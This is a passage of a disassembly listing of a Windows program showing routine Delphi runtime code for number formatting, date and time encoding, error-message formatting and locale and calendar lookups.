adc dword ptr [ebx+4], 0
neg dword ptr [ebx+4]
call sub_406B87
mov al, 2Dh
inc ecx
dec esi
mov [esi], al
retn
sub_406AC7 endp
; =============== S U B R O U T I N E =======================================
sub_406B87 proc near ; CODE XREF: sub_406AC7+94�j
; sub_406AC7+A9�j ...
mov ecx, 0Ah
loc_406B8C: ; CODE XREF: sub_406AC7+A0�j
lea esi, [ebp-51h]
loc_406B8F: ; CODE XREF: sub_406B87+3C�j
push ecx
push 0
push ecx
mov eax, [ebx]
mov edx, [ebx+4]
call sub_4052E9
pop ecx
xchg eax, edx
add dl, 30h
cmp dl, 3Ah
jb short loc_406BAA
add dl, 7
loc_406BAA: ; CODE XREF: sub_406B87+1E�j
dec esi
mov [esi], dl
push ecx
push 0
push ecx
mov eax, [ebx]
mov edx, [ebx+4]
call sub_4051F4
pop ecx
mov [ebx], eax
mov [ebx+4], edx
or eax, edx
jnz short loc_406B8F
lea ecx, [ebp-51h]
sub ecx, esi
mov edx, [ebp-20h]
cmp edx, 10h
jbe short loc_406BD3
retn
; ---------------------------------------------------------------------------
loc_406BD3: ; CODE XREF: sub_406B87+49�j
sub edx, ecx
jbe short locret_406BE1
add ecx, edx
mov al, 30h
loc_406BDB: ; CODE XREF: sub_406B87+58�j
dec esi
mov [esi], al
dec edx
jnz short loc_406BDB
locret_406BE1: ; CODE XREF: sub_406B87+4E�j
retn
sub_406B87 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_406AC7
loc_406BE2: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7:off_406AEE�o
cmp cl, 44h
jz short loc_406BFC
cmp cl, 55h
jz short sub_406C0E
cmp cl, 58h
jnz loc_406B32
mov ecx, 10h
jmp short loc_406C13
; ---------------------------------------------------------------------------
loc_406BFC: ; CODE XREF: sub_406AC7+11E�j
or eax, eax
jns short sub_406C0E
neg eax
call sub_406C0E
mov al, 2Dh
inc ecx
dec esi
mov [esi], al
retn
; END OF FUNCTION CHUNK FOR sub_406AC7
; =============== S U B R O U T I N E =======================================
sub_406C0E proc near ; CODE XREF: sub_406AC7+123�j
; sub_406AC7+137�j ...
mov ecx, 0Ah
loc_406C13: ; CODE XREF: sub_406AC7+133�j
; sub_406AC7+237�j
lea esi, [ebp-61h]
loc_406C16: ; CODE XREF: sub_406C0E+1C�j
xor edx, edx
div ecx
add dl, 30h
cmp dl, 3Ah
jb short loc_406C25
add dl, 7
loc_406C25: ; CODE XREF: sub_406C0E+12�j
dec esi
mov [esi], dl
or eax, eax
jnz short loc_406C16
lea ecx, [ebp-61h]
sub ecx, esi
mov edx, [ebp-20h]
cmp edx, 10h
jbe short loc_406C3A
retn
; ---------------------------------------------------------------------------
loc_406C3A: ; CODE XREF: sub_406C0E+29�j
sub edx, ecx
jbe short locret_406C48
add ecx, edx
mov al, 30h
loc_406C42: ; CODE XREF: sub_406C0E+38�j
dec esi
mov [esi], al
dec edx
jnz short loc_406C42
locret_406C48: ; CODE XREF: sub_406C0E+2E�j
retn
sub_406C0E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_406AC7
loc_406C49: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+2F�o
cmp cl, 53h
jnz loc_406B32
mov ecx, 1
retn
; ---------------------------------------------------------------------------
loc_406C58: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+5B�o
cmp cl, 53h
jnz loc_406B32
cmp word ptr [eax], 1
jbe short loc_406C76
mov edx, eax
lea eax, [ebp-0Ch]
call sub_40697C
mov esi, [ebp-0Ch]
jmp short loc_406CB8
; ---------------------------------------------------------------------------
loc_406C76: ; CODE XREF: sub_406AC7+19E�j
; sub_406AC7+1F3�j
xor ecx, ecx
retn
; ---------------------------------------------------------------------------
loc_406C79: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+37�o
cmp cl, 53h
jnz loc_406B32
mov esi, eax
lodsb
movzx ecx, al
jmp short loc_406CBF
; ---------------------------------------------------------------------------
loc_406C8A: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+4F�o
mov esi, offset sub_4033B0
jmp short loc_406C96
; ---------------------------------------------------------------------------
loc_406C91: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+63�o
mov esi, offset sub_403410
loc_406C96: ; CODE XREF: sub_406AC7+1C8�j
cmp cl, 53h
jnz loc_406B32
mov edx, eax
lea eax, [ebp-10h]
call esi ; sub_4033B0
mov esi, [ebp-10h]
mov eax, esi
jmp short loc_406CB8
; ---------------------------------------------------------------------------
loc_406CAD: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+53�o
cmp cl, 53h
jnz loc_406B32
mov esi, eax
loc_406CB8: ; CODE XREF: sub_406AC7+1AD�j
; sub_406AC7+1E4�j
or esi, esi
jz short loc_406C76
mov ecx, [esi-4]
loc_406CBF: ; CODE XREF: sub_406AC7+1C1�j
cmp ecx, [ebp-20h]
ja short loc_406CC5
retn
; ---------------------------------------------------------------------------
loc_406CC5: ; CODE XREF: sub_406AC7+1FB�j
mov ecx, [ebp-20h]
retn
; ---------------------------------------------------------------------------
loc_406CC9: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+3F�o
cmp cl, 53h
jnz loc_406B32
mov esi, eax
push edi
mov edi, eax
xor al, al
mov ecx, [ebp-20h]
jecxz short loc_406CE3
repne scasb
jnz short loc_406CE3
dec edi
loc_406CE3: ; CODE XREF: sub_406AC7+215�j
; sub_406AC7+219�j
mov ecx, edi
sub ecx, esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_406CE9: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+3B�o
cmp cl, 50h
jnz loc_406B32
mov dword ptr [ebp-20h], 8
mov ecx, 10h
jmp loc_406C13
; ---------------------------------------------------------------------------
loc_406D03: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+57�o
mov bh, 1
jmp short loc_406D09
; ---------------------------------------------------------------------------
loc_406D07: ; CODE XREF: sub_406AC7+20�j
; DATA XREF: sub_406AC7+33�o
mov bh, 0
loc_406D09: ; CODE XREF: sub_406AC7+23E�j
mov esi, eax
mov bl, 0
cmp cl, 47h
jz short loc_406D51
mov bl, 1
cmp cl, 45h
jz short loc_406D51
mov bl, 2
cmp cl, 46h
jz short loc_406D32
mov bl, 3
cmp cl, 4Eh
jz short loc_406D32
cmp cl, 4Dh
jnz loc_406B32
mov bl, 4
loc_406D32: ; CODE XREF: sub_406AC7+257�j
; sub_406AC7+25E�j
mov eax, 12h
mov edx, [ebp-20h]
cmp edx, eax
jbe short loc_406D63
mov edx, 2
cmp cl, 4Dh
jnz short loc_406D63
movzx edx, byte_40C4F8
jmp short loc_406D63
; ---------------------------------------------------------------------------
loc_406D51: ; CODE XREF: sub_406AC7+249�j
; sub_406AC7+250�j
mov eax, [ebp-20h]
mov edx, 3
cmp eax, 12h
jbe short loc_406D63
mov eax, 0Fh
loc_406D63: ; CODE XREF: sub_406AC7+275�j
; sub_406AC7+27F�j ...
push ebx
push eax
push edx
lea eax, [ebp-71h]
mov edx, esi
movzx ecx, bh
call sub_408AD6
mov ecx, eax
lea esi, [ebp-71h]
retn
; END OF FUNCTION CHUNK FOR sub_406AC7
; =============== S U B R O U T I N E =======================================
sub_406D79 proc near ; CODE XREF: sub_406AC7:loc_406B34�p
; sub_40699C:loc_406D84�p
push eax
lea eax, [ebp-10h]
call sub_4031C8
pop eax
retn
sub_406D79 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40699C
loc_406D84: ; CODE XREF: sub_40699C+3B�j
call sub_406D79
pop edi
pop esi
pop ebx
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_40699C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D94 proc near ; CODE XREF: sub_407704+169�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, ecx
mov edi, edx
mov ebx, eax
mov eax, esi
call sub_406834
push eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
mov ecx, esi
mov eax, ebx
mov edx, edi
call sub_40699C
mov byte ptr [ebx+eax], 0
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn 8
sub_406D94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406DC8 proc near ; CODE XREF: sub_407940+34�p
; sub_4079FC+41�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
xchg eax, ecx
xchg edx, ecx
call sub_406DDC
pop ebp
retn 4
sub_406DC8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406DDC proc near ; CODE XREF: sub_406DC8+A�p
; sub_409808+74�p
var_100A = byte ptr -100Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFF004h
push eax
add esp, 0FFFFFFF4h
push ebx
push esi
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov esi, eax
mov ebx, 1002h
mov eax, [ebp+var_4]
call sub_403424
mov edx, ebx
test edx, edx
jns short loc_406E09
add edx, 3
loc_406E09: ; CODE XREF: sub_406DDC+28�j
sar edx, 2
mov ecx, ebx
sub ecx, edx
cmp eax, ecx
jge short loc_406E38
mov eax, [ebp+var_4]
call sub_403424
push eax
mov eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
mov edx, ebx
dec edx
lea eax, [ebp+var_100A]
call sub_40699C
jmp short loc_406E44
; ---------------------------------------------------------------------------
loc_406E38: ; CODE XREF: sub_406DDC+36�j
mov eax, [ebp+var_4]
call sub_403424
mov ebx, eax
mov eax, ebx
loc_406E44: ; CODE XREF: sub_406DDC+5A�j
mov edx, ebx
dec edx
cmp eax, edx
jl short loc_406E8E
jmp short loc_406E7D
; ---------------------------------------------------------------------------
loc_406E4D: ; CODE XREF: sub_406DDC+A6�j
add ebx, ebx
mov eax, esi
call sub_4031C8
mov eax, esi
mov edx, ebx
call sub_403624
mov eax, [ebp+var_4]
call sub_403424
push eax
mov eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
mov edx, ebx
dec edx
mov eax, [esi]
call sub_40699C
loc_406E7D: ; CODE XREF: sub_406DDC+6F�j
mov edx, ebx
dec edx
cmp eax, edx
jge short loc_406E4D
mov edx, esi
xchg eax, edx
call sub_403624
jmp short loc_406E9C
; ---------------------------------------------------------------------------
loc_406E8E: ; CODE XREF: sub_406DDC+6D�j
lea edx, [ebp+var_100A]
mov ecx, esi
xchg eax, ecx
call sub_4032B0
loc_406E9C: ; CODE XREF: sub_406DDC+B0�j
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_406DDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406EA4 proc near ; CODE XREF: sub_406F14+31�p
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_1], 0
cmp ax, 18h
jnb short loc_406F05
cmp dx, 3Ch
jnb short loc_406F05
cmp cx, 3Ch
jnb short loc_406F05
cmp si, 3E8h
jnb short loc_406F05
movzx eax, ax
imul eax, 36EE80h
movzx edx, dx
imul edx, 0EA60h
add eax, edx
movzx edx, cx
imul edx, 3E8h
add eax, edx
movzx edx, si
add eax, edx
mov [ebp+var_8], eax
fild [ebp+var_8]
fdiv flt_406F10
mov eax, [ebp+arg_0]
fstp qword ptr [eax]
wait
mov [ebp+var_1], 1
loc_406F05: ; CODE XREF: sub_406EA4+12�j
; sub_406EA4+18�j ...
mov al, [ebp+var_1]
pop esi
pop ecx
pop ecx
pop ebp
retn 8
sub_406EA4 endp
; ---------------------------------------------------------------------------
align 10h
flt_406F10 dd 8.64e7 ; DATA XREF: sub_406EA4+51�r
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406F14 proc near ; CODE XREF: sub_4067C8+53�p
; sub_407104+3B�p
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = word ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_C], ebx
mov edi, ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_406F79
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ax, [ebp+arg_0]
push eax
lea eax, [ebp+var_8]
push eax
mov ecx, edi
mov edx, esi
mov eax, ebx
call sub_406EA4
test al, al
jnz short loc_406F63
lea edx, [ebp+var_C]
mov eax, off_40B3C0
call sub_40478C
mov eax, [ebp+var_C]
call sub_406454
loc_406F63: ; CODE XREF: sub_406F14+38�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_406F80
loc_406F70: ; CODE XREF: sub_406F14+6A�j
lea eax, [ebp+var_C]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_406F79: ; DATA XREF: sub_406F14+17�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_406F70
; ---------------------------------------------------------------------------
loc_406F80: ; CODE XREF: sub_406F14+64�j
; DATA XREF: sub_406F14+57�o
fld [ebp+var_8]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_406F14 endp
; =============== S U B R O U T I N E =======================================
sub_406F8C proc near ; CODE XREF: sub_406FC8+19�p
push ebx
push esi
mov ecx, eax
movzx eax, cx
and eax, 3
test eax, eax
jnz short loc_406FBB
movzx ebx, cx
mov eax, ebx
mov esi, 64h
xor edx, edx
div esi
test edx, edx
jnz short loc_406FC0
mov eax, ebx
mov ecx, 190h
xor edx, edx
div ecx
test edx, edx
jz short loc_406FC0
loc_406FBB: ; CODE XREF: sub_406F8C+C�j
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_406FC0: ; CODE XREF: sub_406F8C+1E�j
; sub_406F8C+2D�j
mov al, 1
pop esi
pop ebx
retn
sub_406F8C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406FC8 proc near ; CODE XREF: sub_407090+2C�p
var_8 = dword ptr -8
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov ebx, ecx
mov edi, edx
mov [ebp+var_2], ax
mov [ebp+var_3], 0
mov ax, [ebp+var_2]
call sub_406F8C
and eax, 7Fh
lea eax, [eax+eax*2]
lea esi, ds:40B0D8h[eax*8]
cmp [ebp+var_2], 1
jb loc_407084
cmp [ebp+var_2], 270Fh
ja short loc_407084
cmp di, 1
jb short loc_407084
cmp di, 0Ch
ja short loc_407084
cmp bx, 1
jb short loc_407084
movzx eax, di
cmp bx, [esi+eax*2-2]
ja short loc_407084
movzx eax, di
dec eax
test eax, eax
jle short loc_407038
mov ecx, 1
loc_40702F: ; CODE XREF: sub_406FC8+6E�j
add bx, [esi+ecx*2-2]
inc ecx
dec eax
jnz short loc_40702F
loc_407038: ; CODE XREF: sub_406FC8+60�j
movzx ecx, [ebp+var_2]
dec ecx
mov eax, ecx
mov esi, 64h
cdq
idiv esi
imul esi, ecx, 16Dh
mov edx, ecx
test edx, edx
jns short loc_407056
add edx, 3
loc_407056: ; CODE XREF: sub_406FC8+89�j
sar edx, 2
add esi, edx
sub esi, eax
mov eax, ecx
mov ecx, 190h
cdq
idiv ecx
add esi, eax
movzx eax, bx
add esi, eax
sub esi, 0A955Ah
mov [ebp+var_8], esi
fild [ebp+var_8]
mov eax, [ebp+arg_0]
fstp qword ptr [eax]
wait
mov [ebp+var_3], 1
loc_407084: ; CODE XREF: sub_406FC8+30�j
; sub_406FC8+3C�j ...
mov al, [ebp+var_3]
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 4
sub_406FC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407090 proc near ; CODE XREF: sub_4067C8+2C�p
; sub_407104+1C�p
var_C = dword ptr -0Ch
var_8 = qword ptr -8
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_C], ebx
mov edi, ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4070F0
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_8]
push eax
mov ecx, edi
mov edx, esi
mov eax, ebx
call sub_406FC8
test al, al
jnz short loc_4070DA
lea edx, [ebp+var_C]
mov eax, off_40B410
call sub_40478C
mov eax, [ebp+var_C]
call sub_406454
loc_4070DA: ; CODE XREF: sub_407090+33�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4070F7
loc_4070E7: ; CODE XREF: sub_407090+65�j
lea eax, [ebp+var_C]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_4070F0: ; DATA XREF: sub_407090+17�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4070E7
; ---------------------------------------------------------------------------
loc_4070F7: ; CODE XREF: sub_407090+5F�j
; DATA XREF: sub_407090+52�o
fld [ebp+var_8]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_407090 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_407104 proc near ; CODE XREF: sub_40A848+127�p
var_20 = qword ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = qword ptr -8
add esp, 0FFFFFFE0h
lea eax, [esp+20h+var_18]
push eax
call sub_4056F0 ; GetLocalTime
mov cx, [esp+20h+var_12]
mov dx, [esp+20h+var_16]
mov ax, [esp+20h+var_18]
call sub_407090
fstp [esp+20h+var_8]
wait
mov ax, [esp+20h+var_A]
push eax
mov cx, [esp+24h+var_C]
mov dx, [esp+24h+var_E]
mov ax, [esp+24h+var_10]
call sub_406F14
fadd [esp+20h+var_8]
fstp [esp+20h+var_20]
wait
fld [esp+20h+var_20]
add esp, 20h
retn
sub_407104 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_407154 proc near ; CODE XREF: sub_409808+4A�p
var_105 = byte ptr -105h
var_104 = byte ptr -104h
push ebx
add esp, 0FFFFFF00h
mov ebx, edx
push 0
push 100h
lea edx, [esp+10Ch+var_104]
push edx
push 0
push eax
push 0
push 3000h
call sub_4056C8 ; FormatMessageA
jmp short loc_40717B
; ---------------------------------------------------------------------------
loc_40717A: ; CODE XREF: sub_407154+32�j
; sub_407154+37�j
dec eax
loc_40717B: ; CODE XREF: sub_407154+24�j
test eax, eax
jle short loc_40718D
mov dl, [esp+eax+104h+var_105]
sub dl, 21h
jb short loc_40717A
sub dl, 0Dh
jz short loc_40717A
loc_40718D: ; CODE XREF: sub_407154+29�j
mov edx, esp
mov ecx, ebx
xchg eax, ecx
call sub_4032B0
add esp, 100h
pop ebx
retn
sub_407154 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4071A0 proc near ; CODE XREF: sub_407214+1C�p
; sub_407428+27�p ...
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFF00h
push ebx
push esi
mov esi, ecx
mov ebx, [ebp+arg_0]
push 100h
lea ecx, [ebp+var_100]
push ecx
push edx
push eax
call sub_4056F8 ; GetLocaleInfoA
test eax, eax
jle short loc_4071D9
mov ecx, eax
dec ecx
lea edx, [ebp+var_100]
mov eax, ebx
call sub_4032B0
jmp short loc_4071E2
; ---------------------------------------------------------------------------
loc_4071D9: ; CODE XREF: sub_4071A0+25�j
mov eax, ebx
mov edx, esi
call sub_40321C
loc_4071E2: ; CODE XREF: sub_4071A0+37�j
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4071A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4071EC proc near ; CODE XREF: sub_4083E0+AD�p
; sub_4083E0+C0�p ...
var_10 = byte ptr -10h
push ebx
push esi
push edi
push ecx
mov ebx, ecx
mov esi, edx
mov edi, eax
push 2
lea eax, [esp+14h+var_10]
push eax
push esi
push edi
call sub_4056F8 ; GetLocaleInfoA
test eax, eax
jle short loc_40720D
mov al, [esp+10h+var_10]
jmp short loc_40720F
; ---------------------------------------------------------------------------
loc_40720D: ; CODE XREF: sub_4071EC+1A�j
mov eax, ebx
loc_40720F: ; CODE XREF: sub_4071EC+1F�j
pop edx
pop edi
pop esi
pop ebx
retn
sub_4071EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407214 proc near ; CODE XREF: sub_407250+46�p
; sub_407250+69�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], ecx
mov edi, edx
mov esi, eax
mov ebx, [ebp+arg_0]
push ebx
mov eax, [ebp+arg_8]
mov eax, [eax-4]
xor ecx, ecx
mov edx, esi
call sub_4071A0
cmp dword ptr [ebx], 0
jnz short loc_407247
mov eax, [ebp+var_4]
mov eax, [eax+edi*4]
mov edx, ebx
call sub_40478C
loc_407247: ; CODE XREF: sub_407214+24�j
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 8
sub_407214 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407250 proc near ; CODE XREF: sub_4083E0+23�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
push edi
xor eax, eax
push ebp
push offset loc_407363
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_405718 ; GetThreadLocale
mov [ebp+var_4], eax
mov ebx, 1
mov esi, offset dword_40C518
mov edi, offset dword_40C548
loc_407283: ; CODE XREF: sub_407250+83�j
push ebp
push 0Bh
lea eax, [ebp+var_C]
push eax
mov ecx, offset off_40B138
mov edx, ebx
dec edx
lea eax, [ebx+44h]
dec eax
call sub_407214
pop ecx
mov edx, [ebp+var_C]
mov eax, esi
call sub_40321C
push ebp
push 0Bh
lea eax, [ebp+var_10]
push eax
mov ecx, offset off_40B168
mov edx, ebx
dec edx
lea eax, [ebx+38h]
dec eax
call sub_407214
pop ecx
mov edx, [ebp+var_10]
mov eax, edi
call sub_40321C
inc ebx
add edi, 4
add esi, 4
cmp ebx, 0Dh
jnz short loc_407283
mov ebx, 1
mov esi, offset dword_40C578
mov edi, offset dword_40C594
loc_4072E4: ; CODE XREF: sub_407250+F6�j
lea eax, [ebx+5]
mov ecx, 7
cdq
idiv ecx
mov [ebp+var_8], edx
push ebp
push 6
lea eax, [ebp+var_14]
push eax
mov ecx, offset off_40B198
mov edx, ebx
dec edx
mov eax, [ebp+var_8]
add eax, 31h
call sub_407214
pop ecx
mov edx, [ebp+var_14]
mov eax, esi
call sub_40321C
push ebp
push 6
lea eax, [ebp+var_18]
push eax
mov ecx, offset off_40B1B4
mov edx, ebx
dec edx
mov eax, [ebp+var_8]
add eax, 2Ah
call sub_407214
pop ecx
mov edx, [ebp+var_18]
mov eax, edi
call sub_40321C
inc ebx
add edi, 4
add esi, 4
cmp ebx, 8
jnz short loc_4072E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40736A
loc_407355: ; CODE XREF: sub_407250+118�j
lea eax, [ebp+var_18]
mov edx, 4
call sub_4031EC
retn
; ---------------------------------------------------------------------------
loc_407363: ; DATA XREF: sub_407250+11�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_407355
; ---------------------------------------------------------------------------
loc_40736A: ; CODE XREF: sub_407250+112�j
; DATA XREF: sub_407250+100�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_407250 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407374 proc near ; DATA XREF: sub_407428+4E�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
xor esi, esi
mov ebx, 1
jmp short loc_407388
; ---------------------------------------------------------------------------
loc_407382: ; CODE XREF: sub_407374+1C�j
cmp ebx, 7
jz short loc_4073A6
inc ebx
loc_407388: ; CODE XREF: sub_407374+C�j
cmp dword_40C5B8[ebx*4], 0
jnz short loc_407382
lea eax, ds:40C5B8h[ebx*4]
mov edx, [ebp+arg_0]
call sub_403380
mov esi, 1
loc_4073A6: ; CODE XREF: sub_407374+11�j
mov eax, esi
pop esi
pop ebx
pop ebp
retn 4
sub_407374 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4073B0 proc near ; DATA XREF: sub_407428+77�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push ebx
push esi
xor eax, eax
push ebp
push offset loc_407415
push dword ptr fs:[eax]
mov fs:[eax], esp
xor esi, esi
mov ebx, 1
jmp short loc_4073D4
; ---------------------------------------------------------------------------
loc_4073CE: ; CODE XREF: sub_4073B0+2C�j
cmp ebx, 7
jz short loc_4073FF
inc ebx
loc_4073D4: ; CODE XREF: sub_4073B0+1C�j
cmp dword_40C5D4[ebx*4], 0FFFFFFFFh
jnz short loc_4073CE
lea eax, [ebp+var_4]
mov edx, [ebp+arg_0]
call sub_403380
mov eax, [ebp+var_4]
xor edx, edx
call sub_406508
mov dword_40C5D4[ebx*4], eax
mov esi, 1
loc_4073FF: ; CODE XREF: sub_4073B0+21�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40741C
loc_40740C: ; CODE XREF: sub_4073B0+6A�j
lea eax, [ebp+var_4]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_407415: ; DATA XREF: sub_4073B0+A�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40740C
; ---------------------------------------------------------------------------
loc_40741C: ; CODE XREF: sub_4073B0+64�j
; DATA XREF: sub_4073B0+57�o
mov eax, esi
pop esi
pop ebx
pop ecx
pop ebp
retn 4
sub_4073B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407428 proc near ; CODE XREF: sub_4083E0+31�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push esi
xor eax, eax
push ebp
push offset loc_4074BF
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
push eax
call sub_405718 ; GetThreadLocale
mov ecx, offset dword_4074D4
mov edx, 100Bh
call sub_4071A0
mov eax, [ebp+var_4]
mov edx, 1
call sub_406508
mov esi, eax
mov eax, esi
add eax, 0FFFFFFFDh
sub eax, 3
jnb short loc_4074A9
push 4
push esi
call sub_405718 ; GetThreadLocale
push eax
push offset sub_407374
call sub_405698 ; EnumCalendarInfoA
mov edx, 7
mov eax, offset dword_40C5D8
loc_40748A: ; CODE XREF: sub_407428+6C�j
mov dword ptr [eax], 0FFFFFFFFh
add eax, 4
dec edx
jnz short loc_40748A
push 3
push esi
call sub_405718 ; GetThreadLocale
push eax
push offset sub_4073B0
call sub_405698 ; EnumCalendarInfoA
loc_4074A9: ; CODE XREF: sub_407428+43�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4074C6
loc_4074B6: ; CODE XREF: sub_407428+9C�j
lea eax, [ebp+var_4]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_4074BF: ; DATA XREF: sub_407428+9�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4074B6
; ---------------------------------------------------------------------------
loc_4074C6: ; CODE XREF: sub_407428+96�j
; DATA XREF: sub_407428+89�o
pop esi
pop ecx
pop ebp
retn
sub_407428 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_4074D4 dd 31h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4074D8 proc near ; CODE XREF: sub_4083E0+11C�p
; sub_4083E0+149�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
push edi
mov edi, edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_40769A
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, 1
mov eax, edi
call sub_4031C8
lea eax, [ebp+var_4]
push eax
call sub_405718 ; GetThreadLocale
mov ecx, offset dword_4076B0
mov edx, 1009h
call sub_4071A0
mov eax, [ebp+var_4]
mov edx, 1
call sub_406508
add eax, 0FFFFFFFDh
sub eax, 3
jb loc_407670
mov ax, word_40C5B4
sub ax, 4
jz short loc_40754C
add eax, 0FFFFFFF3h
sub ax, 2
jb short loc_40754C
